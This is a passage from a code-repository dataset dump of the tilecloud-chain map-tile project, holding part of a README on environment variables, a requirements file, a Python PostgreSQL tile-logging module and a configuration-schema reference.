``2``, the number of thread used to generate the tiles (If we use meta tiles)\n- ``METATILE_NB_THREAD``: Default is ``25``, the number of thread used to generate the meta tiles (If we use\n meta tiles, also to generate the tiles)\n- ``SERVER_NB_THREAD``: Default to ``10``, the number of thread used to generate the meta tiles in the server.\n- ``TILE_QUEUE_SIZE``: Default to ``2``, the queue size just after the Redis queue\n- ``TILE_CHUNK_SIZE``: Default to ``1``, the chunk size to process the tiles after the meta tiles.\n- ``TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH``: Default to ``1000``, the maximum number of character of the\n output to be display in the admin interface.\n- ``LOG_TYPE``: Default to ``console``, can also be ``json`` to log in JSON for ``Logstash``.\n- ``TILECLOUD_CHAIN_LOG_LEVEL`` Default to ``INFO``,\n ``TILECLOUD_LOG_LEVEL`` Default to ``INFO``,\n ``C2CWSGI_LOG_LEVEL`` Default to ``WARN``,\n ``OTHER_LOG_LEVEL`` Default to ``WARN``, the logging level of deferent components, can be ``DEBUG``,\n ``INFO``, ``WARN``, ``ERROR`` or ``CRITICAL``.\n- ``TILE_SERVER_LOGLEVEL`` Default to ``quiet`` the log level used in the server part.\n- ``TILE_MAPCACHE_LOGLEVEL``Default to ``verbose`` the log level used in the internal mapcache.\n- ``DEVELOPMENT``: Default to ``0`` set it to ``1`` to have the Pyramid development options.\n- ``VISIBLE_ENTRY_POINT`` Default to ``/tiles/`` the entrypoint path.\n\n\nAdmin and test pages\n--------------------\n\nOn the URL `<base URL>/admin/` you can see the status of the generation, a tool to generate the tiles, and a link\nto a test page.\n\nBeware, the test page assumes we have configured only one grid.\n" }, { "alpha_fraction": 0.6323529481887817, "alphanum_fraction": 0.7573529481887817, "avg_line_length": 26.200000762939453, "blob_id": "61f3fc594b22252a828648ce917b548fd511320c", "content_id": "fb3d872d183f8a292ec560eb32c9ac169369a2ed", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 136, "license_type": "permissive", "max_line_length": 47, "num_lines": 5, "path": "/requirements.txt", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "poetry==1.5.1\npoetry-plugin-export==1.4.0\npoetry-dynamic-versioning==0.25.0\npoetry-plugin-tweak-dependencies-version==1.4.0\npip==23.2.1\n" }, { "alpha_fraction": 0.48914387822151184, "alphanum_fraction": 0.49620476365089417, "avg_line_length": 38.34027862548828, "blob_id": "13113504dc20ea2a0ad9ed7b7ae50f02a5885dc1", "content_id": "6469504228293ae6b166e142f4c7eea4f32dac6b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5665, "license_type": "permissive", "max_line_length": 110, "num_lines": 144, "path": "/tilecloud_chain/database_logger.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport sys\nimport time\n\nimport psycopg2.sql\nfrom prometheus_client import Summary\n\nimport tilecloud_chain.configuration\nfrom tilecloud import Tile\n\n_LOGGER = logging.getLogger(__name__)\n\n_INSERT_SUMMARY = Summary(\"tilecloud_chain_database_logger\", \"Number of database inserts\", [\"layer\"])\n\n\nclass DatabaseLoggerCommon:\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool):\n db_params = config[\"database\"]\n while True:\n try:\n self.connection = psycopg2.connect(\n dbname=db_params[\"dbname\"],\n host=db_params.get(\"host\"),\n port=db_params.get(\"port\"),\n user=db_params.get(\"user\"),\n password=db_params.get(\"password\"),\n )\n break\n except psycopg2.OperationalError:\n _LOGGER.warning(\"Failed connecting to the database. Will try again in 1s\", exc_info=True)\n if daemon:\n time.sleep(1)\n else:\n sys.exit(2)\n if \".\" in db_params[\"table\"]:\n schema, table = db_params[\"table\"].split(\".\")\n else:\n schema = \"public\"\n table = db_params[\"table\"]\n\n with self.connection.cursor() as cursor:\n cursor.execute(\n \"SELECT EXISTS(SELECT 1 FROM pg_tables WHERE schemaname=%s AND tablename=%s)\", (schema, table)\n )\n schema = psycopg2.extensions.quote_ident(schema, self.connection)\n table = psycopg2.extensions.quote_ident(table, self.connection)\n\n if not cursor.fetchone()[0]:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"CREATE TABLE {}.{} (\"\n \" id BIGSERIAL PRIMARY KEY,\"\n \" layer CHARACTER VARYING(80) NOT NULL,\"\n \" run INTEGER NOT NULL,\"\n \" action CHARACTER VARYING(7) NOT NULL,\"\n \" tile TEXT NOT NULL,\"\n \" UNIQUE (layer, run, tile))\"\n ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table))\n )\n self.connection.commit()\n except psycopg2.DatabaseError:\n logging.exception(\"Unable to create table %s.%s\", schema, table)\n sys.exit(1)\n else:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {}.{}(layer, run, action, tile) VALUES (%s, %s, %s, %s)\"\n ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table)),\n (\"test_layer\", -1, \"test\", \"-1x-1\"),\n )\n except psycopg2.DatabaseError:\n logging.exception(\"Unable to insert logging data into %s.%s\", schema, table)\n sys.exit(1)\n finally:\n self.connection.rollback()\n\n self.schema = schema\n self.table = table\n\n\nclass DatabaseLoggerInit(DatabaseLoggerCommon):\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool) -> None:\n super().__init__(config, daemon)\n\n with self.connection.cursor() as cursor:\n cursor.execute(\n psycopg2.sql.SQL(\"SELECT COALESCE(MAX(run), 0) + 1 FROM {}.{}\").format(\n psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)\n )\n )\n (self.run,) = cursor.fetchone()\n\n def __call__(self, tile: Tile) -> Tile:\n tile.metadata[\"run\"] = self.run\n return tile\n\n\nclass DatabaseLogger(DatabaseLoggerCommon):\n \"\"\"Log the generated tiles in a database.\"\"\"\n\n def __call__(self, tile: Tile) -> Tile:\n if tile is None:\n _LOGGER.warning(\"The tile is None\")\n return None\n\n if tile.error:\n action = \"error\"\n elif tile.data:\n action = \"create\"\n else:\n action = \"delete\"\n\n layer = tile.metadata.get(\"layer\", \"- No layer -\")\n run = tile.metadata.get(\"run\", -1)\n\n with _INSERT_SUMMARY.labels(layer).time():\n with self.connection.cursor() as cursor:\n try:\n cursor.execute(\n psycopg2.sql.SQL(\n \"INSERT INTO {} (layer, run, action, tile) \"\n \"VALUES (%(layer)s, %(run)s, %(action)s::varchar(7), %(tile)s)\"\n ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n )\n except psycopg2.IntegrityError:\n self.connection.rollback()\n cursor.execute(\n psycopg2.sql.SQL(\n \"UPDATE {} SET action = %(action)s \"\n \"WHERE layer = %(layer)s AND run = %(run)s AND tile = %(tile)s\"\n ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n )\n\n self.connection.commit()\n\n return tile\n" }, { "alpha_fraction": 0.6599125266075134, "alphanum_fraction": 0.6689502000808716, "avg_line_length": 89.91227722167969, "blob_id": "75a8b994672fa2c24d32b66173803540aef475f0", "content_id": "e66dec882c4d984874691cf00246f879f0867c4d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31092, "license_type": "permissive", "max_line_length": 350, "num_lines": 342, "path": "/tilecloud_chain/CONFIG.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# TileCloud-chain configuration\n\n## Properties\n\n- **`defaults`** _(object)_: Used to put YAML references.\n- **`grids`** _(object)_: The WMTS grid definitions by grid name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-grids. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/grid](#definitions/grid)_.\n- **`caches`** _(object)_: The tiles caches definitions by name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-caches. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/cache](#definitions/cache)_.\n- **`layers`** _(object)_: The layers definitions by name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-layers. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/layer](#definitions/layer)_.\n- **`process`** _(object)_: List of available commands by name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#process. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/process](#definitions/process)_.\n- **`generation`**: Refer to _[#/definitions/generation](#definitions/generation)_.\n- **`sqs`** _(object)_: The Simple Queue Service configuration. Cannot contain additional properties.\n - **`queue`** _(string)_: The queue name, default is 'tilecloud'.\n - **`region`**: Refer to _[#/definitions/aws_region](#definitions/aws_region)_.\n- **`sns`** _(object)_: The Simple Notification Service configuration, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-sns. Cannot contain additional properties.\n - **`topic`** _(string, required)_: The topic.\n - **`region`**: Refer to _[#/definitions/aws_region](#definitions/aws_region)_.\n- **`redis`**: Refer to _[#/definitions/redis](#definitions/redis)_.\n- **`openlayers`** _(object)_: Configuration used to generate the OpenLayers example page. Cannot contain additional properties.\n - **`srs`** _(string)_: The projection code. Default: `\"EPSG:2056\"`.\n - **`proj4js_def`** _(string)_: The proj4js definition, get it from https://epsg.io/. Default: `\"+proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=2600000 +y_0=1200000 +ellps=bessel +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\"`.\n - **`center_x`** _(number)_: The center easting. Default: `2600000`.\n - **`center_y`** _(number)_: The center northing. Default: `1200000`.\n - **`zoom`** _(number)_: The initial zoom. Default: `3`.\n- **`server`**: Refer to _[#/definitions/server](#definitions/server)_.\n- **`cost`**: Refer to _[#/definitions/cost](#definitions/cost)_.\n- **`metadata`**: Refer to _[#/definitions/metadata](#definitions/metadata)_.\n- **`provider`**: Refer to _[#/definitions/provider](#definitions/provider)_.\n- **`logging`**: Refer to _[#/definitions/logging](#definitions/logging)_.\n- **`authentication`** _(object)_: The authentication configuration. Cannot contain additional properties.\n - **`github_repository`** _(string)_: The GitHub repository name, on witch one we will check the access rights.\n - **`github_access_type`** _(string)_: The kind of rights the user should have on the repository. Must be one of: `[\"push\", \"pull\", \"admin\"]`. Default: `\"pull\"`.\n\n## Definitions\n\n- <a id=\"definitions/headers\"></a>**`headers`** _(object)_: The headers that we send to the WMS backend. Can contain additional properties.\n - **Additional Properties** _(string)_: The header value.\n- <a id=\"definitions/grid\"></a>**`grid`** _(object)_: The WMTS grid definition, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-grids. Cannot contain additional properties.\n - **`resolution_scale`** _(integer)_: The scale used to build a FreeTileGrid typically '2'.\n - **`resolutions`** _(array, required)_: The resolutions in pixel per meter.\n - **Items** _(number)_\n - **`bbox`** _(array, required)_: The bounding box in meter.\n - **Items** _(number)_\n - **`srs`** _(string, required)_: The projection reference.\n - **`proj4_literal`** _(string)_: The Proj4 definition.\n - **`unit`** _(string)_: The projection unit, default is 'm'. Default: `\"m\"`.\n - **`tile_size`** _(integer)_: The tile size in pixel, default is 256. Default: `256`.\n - **`matrix_identifier`** _(string)_: The identifier to use in the tiles URL, recommend to be resolution (default). Must be one of: `[\"zoom\", \"resolution\"]`. Default: `\"zoom\"`.\n- <a id=\"definitions/cache_wmtscapabilities_file\"></a>**`cache_wmtscapabilities_file`** _(string)_: The generated WMTS capabilities file name (by 'default 1.0.0/WMTSCapabilities.xml').\n- <a id=\"definitions/cache_http_url\"></a>**`cache_http_url`** _(string)_: The HTTP URL %host will be replaces by one of the hosts.\n- <a id=\"definitions/cache_hosts\"></a>**`cache_hosts`** _(array)_: The host used to build the HTTP URLs.\n - **Items** _(string)_\n- <a id=\"definitions/cache_http_urls\"></a>**`cache_http_urls`** _(array)_\n - **Items** _(string)_\n- <a id=\"definitions/cache_folder\"></a>**`cache_folder`** _(string)_: The root folder of the cache, default is ''. Default: `\"\"`.\n- <a id=\"definitions/cache_filesystem\"></a>**`cache_filesystem`** _(object)_: Can contain additional properties.\n - **Additional Properties** _(string)_\n - **`type`**\n - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache_s3\"></a>**`cache_s3`** _(object)_: Can contain additional properties.\n - **Additional Properties** _(string)_\n - **`type`**\n - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n - **`tiles_url`** _(string)_: The template tiles URL on S3, the argument can be region, bucket and folder (default is 'http://s3-{region}.amazonaws.com/{bucket}/{folder}').\n - **`host`** _(string)_: The S3 host, default is 's3-eu-west-1.amazonaws.com'.\n - **`bucket`** _(string, required)_: The S3 bucker name.\n - **`region`**: Refer to _[#/definitions/aws_region](#definitions/aws_region)_.\n - **`cache_control`** _(string)_: The Cache-Control used to store tiles on S3.\n - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache_azure\"></a>**`cache_azure`** _(object)_: Azure Blob Storage. Can contain additional properties.\n - **Additional Properties** _(string)_\n - **`type`**\n - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n - **`container`** _(string, required)_: The Azure container name.\n - **`cache_control`** _(string)_: The Cache-Control used to store tiles on Azure.\n- <a id=\"definitions/cache_mbtiles\"></a>**`cache_mbtiles`** _(object)_: Can contain additional properties.\n - **Additional Properties** _(string)_\n - **`type`**\n - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache_bsddb\"></a>**`cache_bsddb`** _(object)_: Can contain additional properties.\n - **Additional Properties** _(string)_\n - **`type`**\n - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache\"></a>**`cache`**: The tiles cache definition, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-caches.\n - **Any of**\n - : Refer to _[#/definitions/cache_filesystem](#definitions/cache_filesystem)_.\n - : Refer to _[#/definitions/cache_s3](#definitions/cache_s3)_.\n - : Refer to _[#/definitions/cache_azure](#definitions/cache_azure)_.\n - : Refer to _[#/definitions/cache_mbtiles](#definitions/cache_mbtiles)_.\n - : Refer to _[#/definitions/cache_bsddb](#definitions/cache_bsddb)_.\n- <a id=\"definitions/layer_title\"></a>**`layer_title`** _(string)_: The title, use to generate the capabilities.\n- <a id=\"definitions/layer_grid\"></a>**`layer_grid`** _(string)_: The used grid name.\n- <a id=\"definitions/layer_bbox\"></a>**`layer_bbox`** _(array)_: The bounding box where we will generate the tiles.\n - **Items** _(number)_\n- <a id=\"definitions/layer_min_resolution_seed\"></a>**`layer_min_resolution_seed`** _(number)_: The minimum resolutions to pre-generate.\n- <a id=\"definitions/layer_px_buffer\"></a>**`layer_px_buffer`** _(integer)_: The buffer in pixel used to calculate geometry intersection, default is 0. Default: `0`.\n- <a id=\"definitions/layer_meta\"></a>**`layer_meta`** _(boolean)_: Use meta-tiles, default is False, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#meta-tiles. Default: `false`.\n- <a id=\"definitions/layer_meta_size\"></a>**`layer_meta_size`** _(integer)_: The meta-tile size in tiles, default is 5.\n- <a id=\"definitions/layer_meta_buffer\"></a>**`layer_meta_buffer`** _(integer)_: The meta-tiles buffer in pixels, default is 128.\n- <a id=\"definitions/layer_layers\"></a>**`layer_layers`** _(string)_: The WMS layers.\n- <a id=\"definitions/layer_wmts_style\"></a>**`layer_wmts_style`** _(string)_: The WMTS style.\n- <a id=\"definitions/layer_mime_type\"></a>**`layer_mime_type`** _(string)_: The MIME type of the tiles.\n- <a id=\"definitions/layer_extension\"></a>**`layer_extension`** _(string)_: The layer extension.\n- <a id=\"definitions/layer_dimension_name\"></a>**`layer_dimension_name`** _(string)_: The dimension name.\n- <a id=\"definitions/layer_dimensions\"></a>**`layer_dimensions`** _(array)_: The WMTS dimensions.\n - **Items** _(object)_: Cannot contain additional properties.\n - **`name`**: Refer to _[#/definitions/layer_dimension_name](#definitions/layer_dimension_name)_.\n - **`generate`** _(array, required)_: The values that should be generate.\n - **Items** _(string)_\n - **`values`** _(array, required)_: The values present in the capabilities.\n - **Items** _(string)_\n - **`default`** _(string, required)_: The default value present in the capabilities.\n- <a id=\"definitions/layer_legends\"></a>**`layer_legends`** _(array)_: The provided legend.\n - **Items** _(object)_: Cannot contain additional properties.\n - **`mime_type`** _(string, required)_: The mime type used in the WMS request.\n - **`href`** _(string, required)_: The URL of the legend image.\n - **`width`** _(string)_: The width of the legend image.\n - **`height`** _(string)_: The height of the legend image.\n - **`min_scale`** _(string)_: The max scale of the legend image.\n - **`max_scale`** _(string)_: The max scale of the legend image.\n - **`min_resolution`** _(string)_: The max resolution of the legend image.\n - **`max_resolution`** _(string)_: The max resolution of the legend image.\n- <a id=\"definitions/layer_legend_mime\"></a>**`layer_legend_mime`** _(string)_: The mime type used to store the generated legend.\n- <a id=\"definitions/layer_legend_extension\"></a>**`layer_legend_extension`** _(string)_: The extension used to store the generated legend.\n- <a id=\"definitions/layer_pre_hash_post_process\"></a>**`layer_pre_hash_post_process`** _(string)_: Do an image post process before the empty hash check.\n- <a id=\"definitions/layer_post_process\"></a>**`layer_post_process`** _(string)_: Do an image post process after the empty hash check.\n- <a id=\"definitions/layer_geoms\"></a>**`layer_geoms`** _(array)_: The geometries used to determine where we should create the tiles, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-geomsql.\n - **Items** _(object)_: Cannot contain additional properties.\n - **`connection`** _(string, required)_: The PostgreSQL connection string.\n - **`sql`** _(string, required)_: The SQL query that get the geometry in geom e.g. 'the_geom AS geom FROM my_table'.\n - **`min_resolution`** _(number)_: The min resolution where the query is valid.\n - **`max_resolution`** _(number)_: The max resolution where the query is valid.\n- <a id=\"definitions/layer_empty_tile_detection\"></a>**`layer_empty_tile_detection`** _(object)_: The rules used to detect the empty tiles, use `generate-tiles --get-hash` to get what we can use, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-hash. Cannot contain additional properties.\n - **`size`** _(integer, required)_: The tile size.\n - **`hash`** _(string, required)_: The tile hash.\n- <a id=\"definitions/layer_empty_metatile_detection\"></a>**`layer_empty_metatile_detection`** _(object)_: The rules used to detect the empty meta-tiles, use `generate-tiles --get-hash` to get what we can use, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-hash. Cannot contain additional properties.\n - **`size`** _(integer, required)_: The meta-tile size.\n - **`hash`** _(string, required)_: The meta-tile hash.\n- <a id=\"definitions/layer_cost\"></a>**`layer_cost`** _(object)_: The rules used to calculate the cost. Cannot contain additional properties.\n - **`tileonly_generation_time`** _(number)_: The time to generate a tile without meta-tile. Default: `40`.\n - **`tile_generation_time`** _(number)_: The time to generate a tile from the meta-tile. Default: `30`.\n - **`metatile_generation_time`** _(number)_: The time to generate a meta-tile. Default: `30`.\n - **`tile_size`** _(number)_: The tile mean size in bytes. Default: `20`.\n- <a id=\"definitions/layer_wms\"></a>**`layer_wms`** _(object)_: Cannot contain additional properties.\n - **`type`**\n - **`title`**: Refer to _[#/definitions/layer_title](#definitions/layer_title)_.\n - **`grid`**: Refer to _[#/definitions/layer_grid](#definitions/layer_grid)_.\n - **`bbox`**: Refer to _[#/definitions/layer_bbox](#definitions/layer_bbox)_.\n - **`min_resolution_seed`**: Refer to _[#/definitions/layer_min_resolution_seed](#definitions/layer_min_resolution_seed)_.\n - **`px_buffer`**: Refer to _[#/definitions/layer_px_buffer](#definitions/layer_px_buffer)_.\n - **`meta`**: Refer to _[#/definitions/layer_meta](#definitions/layer_meta)_.\n - **`meta_size`**: Refer to _[#/definitions/layer_meta_size](#definitions/layer_meta_size)_. Default: `5`.\n - **`meta_buffer`**: Refer to _[#/definitions/layer_meta_buffer](#definitions/layer_meta_buffer)_. Default: `128`.\n - **`layers`**: Refer to _[#/definitions/layer_layers](#definitions/layer_layers)_.\n - **`wmts_style`**: Refer to _[#/definitions/layer_wmts_style](#definitions/layer_wmts_style)_.\n - **`mime_type`**: Refer to _[#/definitions/layer_mime_type](#definitions/layer_mime_type)_.\n - **`extension`**: Refer to _[#/definitions/layer_extension](#definitions/layer_extension)_.\n - **`dimensions`**: Refer to _[#/definitions/layer_dimensions](#definitions/layer_dimensions)_.\n - **`legends`**: Refer to _[#/definitions/layer_legends](#definitions/layer_legends)_.\n - **`legend_mime`**: Refer to _[#/definitions/layer_legend_mime](#definitions/layer_legend_mime)_.\n - **`legend_extension`**: Refer to _[#/definitions/layer_legend_extension](#definitions/layer_legend_extension)_.\n - **`pre_hash_post_process`**: Refer to _[#/definitions/layer_pre_hash_post_process](#definitions/layer_pre_hash_post_process)_.\n - **`post_process`**: Refer to _[#/definitions/layer_post_process](#definitions/layer_post_process)_.\n - **`geoms`**: Refer to _[#/definitions/layer_geoms](#definitions/layer_geoms)_.\n - **`empty_tile_detection`**: Refer to _[#/definitions/layer_empty_tile_detection](#definitions/layer_empty_tile_detection)_.\n - **`empty_metatile_detection`**: Refer to _[#/definitions/layer_empty_metatile_detection](#definitions/layer_empty_metatile_detection)_.\n - **`cost`**: Refer to _[#/definitions/layer_cost](#definitions/layer_cost)_.\n - **`url`** _(string, required)_: The WMS service URL.\n - **`generate_salt`** _(boolean)_: Should generate a salt to drop the cache, default is False.\n - **`query_layers`** _(string)_: The layers use for query (To be used with the server).\n - **`info_formats`** _(array)_: The query info format.\n - **Items** _(string)_\n - **`params`** _(object)_: Additional parameters to the WMS query (like dimension). Can contain additional properties.\n - **Additional Properties** _(string)_: The parameter value.\n - **`headers`**: Refer to _[#/definitions/headers](#definitions/headers)_.\n - **`version`** _(string)_: The used WMS version (default is '1.1.1').\n- <a id=\"definitions/layer_mapnik\"></a>**`layer_mapnik`** _(object)_: Cannot contain additional properties.\n - **`type`**\n - **`title`**: Refer to _[#/definitions/layer_title](#definitions/layer_title)_.\n - **`grid`**: Refer to _[#/definitions/layer_grid](#definitions/layer_grid)_.\n - **`bbox`**: Refer to _[#/definitions/layer_bbox](#definitions/layer_bbox)_.\n - **`min_resolution_seed`**: Refer to _[#/definitions/layer_min_resolution_seed](#definitions/layer_min_resolution_seed)_.\n - **`px_buffer`**: Refer to _[#/definitions/layer_px_buffer](#definitions/layer_px_buffer)_.\n - **`meta`**: Refer to _[#/definitions/layer_meta](#definitions/layer_meta)_.\n - **`meta_size`**: Refer to _[#/definitions/layer_meta_size](#definitions/layer_meta_size)_. Default: `1`.\n - **`meta_buffer`**: Refer to _[#/definitions/layer_meta_buffer](#definitions/layer_meta_buffer)_. Default: `0`.\n - **`layers`**: Refer to _[#/definitions/layer_layers](#definitions/layer_layers)_. Default: `\"__all__\"`.\n - **`wmts_style`**: Refer to _[#/definitions/layer_wmts_style](#definitions/layer_wmts_style)_.\n - **`mime_type`**: Refer to _[#/definitions/layer_mime_type](#definitions/layer_mime_type)_.\n - **`extension`**: Refer to _[#/definitions/layer_extension](#definitions/layer_extension)_.\n - **`dimensions`**: Refer to _[#/definitions/layer_dimensions](#definitions/layer_dimensions)_.\n - **`legends`**: Refer to _[#/definitions/layer_legends](#definitions/layer_legends)_.\n - **`legend_mime`**: Refer to _[#/definitions/layer_legend_mime](#definitions/layer_legend_mime)_.\n - **`legend_extension`**: Refer to _[#/definitions/layer_legend_extension](#definitions/layer_legend_extension)_.\n - **`pre_hash_post_process`**: Refer to _[#/definitions/layer_pre_hash_post_process](#definitions/layer_pre_hash_post_process)_.\n - **`post_process`**: Refer to _[#/definitions/layer_post_process](#definitions/layer_post_process)_.\n - **`geoms`**: Refer to _[#/definitions/layer_geoms](#definitions/layer_geoms)_.\n - **`empty_tile_detection`**: Refer to _[#/definitions/layer_empty_tile_detection](#definitions/layer_empty_tile_detection)_.\n - **`empty_metatile_detection`**: Refer to _[#/definitions/layer_empty_metatile_detection](#definitions/layer_empty_metatile_detection)_.\n - **`cost`**: Refer to _[#/definitions/layer_cost](#definitions/layer_cost)_.\n - **`mapfile`** _(string)_: The Mapnik map file.\n - **`data_buffer`** _(integer)_: The data buffer, default is 128.\n - **`output_format`** _(string)_: The Mapnik output format, default is 'png'. Must be one of: `[\"png\", \"png256\", \"jpeg\", \"grid\"]`.\n - **`wms_url`** _(string)_: A WMS fallback URL (deprecated).\n - **`resolution`** _(integer)_: The resolution, default is 4.\n - **`layers_fields`** _(object)_: The Mapnik layers fields. Can contain additional properties.\n - **Additional Properties** _(array)_: The Mapnik layer fields.\n - **Items** _(string)_\n - **`drop_empty_utfgrid`** _(boolean)_: Drop if the tile is empty, default is False.\n- <a id=\"definitions/layer\"></a>**`layer`**: The layer definition, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-layers.\n - **Any of**\n - : Refer to _[#/definitions/layer_wms](#definitions/layer_wms)_.\n - : Refer to _[#/definitions/layer_mapnik](#definitions/layer_mapnik)_.\n- <a id=\"definitions/process\"></a>**`process`** _(array)_: A command.\n - **Items** _(object)_: Cannot contain additional properties.\n - **`cmd`** _(string, required)_: The shell command, available parameters: %(in)s, %(out)s, %(args)s, %(x)s, %(y)s, %(z)s.\n - **`need_out`** _(boolean)_: The command will generate an output in a file, default is False. Default: `false`.\n - **`arg`** _(object)_: Used to build the %(args). Cannot contain additional properties.\n - **`default`** _(string)_: The arguments used by default.\n - **`verbose`** _(string)_: The arguments used on verbose mode.\n - **`debug`** _(string)_: The arguments used on debug mode.\n - **`quiet`** _(string)_: The arguments used on quiet mode.\n- <a id=\"definitions/generation\"></a>**`generation`** _(object)_: The configuration used for the generation. Cannot contain additional properties.\n - **`default_cache`** _(string)_: The default cache name to be used, default do 'default'. Default: `\"default\"`.\n - **`default_layers`** _(array)_: The default layers to be generated.\n - **Items** _(string)_\n - **`authorised_user`** _(string)_: The authorized user to generate the tiles (used to avoid permission issue on generated tiles) (main configuration).\n - **`maxconsecutive_errors`** _(integer)_: The maximum number of consecutive errors (main configuration), default is 10. Default: `10`.\n - **`error_file`** _(string)_: File name generated with the tiles in error, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#tiles-error-file (main configuration).\n - **`number_process`** _(integer)_: Number of process used to generate the tiles (main configuration), default is 1. Default: `1`.\n- <a id=\"definitions/aws_region\"></a>**`aws_region`** _(string)_: The region, default is 'eu-west-1'.\n- <a id=\"definitions/redis\"></a>**`redis`** _(object)_: The Redis configuration (main configuration). Cannot contain additional properties.\n - **`url`** _(string)_: The server URL (main configuration).\n - **`sentinels`** _(array)_: The sentinels (main configuration).\n - **Items** _(array)_: A sentinel (main configuration).\n - **Items**:\n - _string_: The sentinel host name (main configuration).\n - : The sentinel port (main configuration).\n - **Any of**\n - _string_\n - _integer_\n - **`connection_kwargs`** _(object)_: The Redis connection arguments (main configuration).\n - **`sentinel_kwargs`** _(object)_: The Redis sentinel arguments (main configuration).\n - **`service_name`** _(string)_: The service name, default is 'mymaster' (main configuration). Default: `\"mymaster\"`.\n - **`socket_timeout`** _(integer)_: The socket timeout (main configuration).\n - **`db`** _(integer)_\n - **`queue`** _(string)_: The queue name (main configuration). Default: `\"tilecloud\"`.\n - **`timeout`** _(integer)_: The timeout (main configuration), default is 5. Default: `5`.\n - **`pending_timeout`** _(integer)_: The pending timeout (main configuration), default is 